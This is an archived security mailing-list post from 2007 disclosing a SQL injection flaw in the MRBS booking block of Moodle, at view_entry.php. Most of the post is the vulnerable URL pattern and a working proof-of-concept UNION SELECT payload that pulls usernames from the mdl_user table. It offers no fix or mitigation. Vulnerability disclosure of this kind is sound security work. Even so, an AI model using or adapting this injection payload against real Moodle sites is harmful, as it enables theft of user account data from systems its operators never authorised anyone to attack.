|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Moodle SQL Injection
root
hanicker.it
Date: Fri Dec 21 2007 - 04:04:31 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Moodle.org
PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=[SQL]&day=27&month=10&year=2007
And a POC:
PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=2000%20UNION%20SELECT%20username,id,id,id,id,id,id,id,id,id,id,id%20FROM%20mdl_user%20WHERE%20id=[ID]&day=27&month=10&year=2007
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]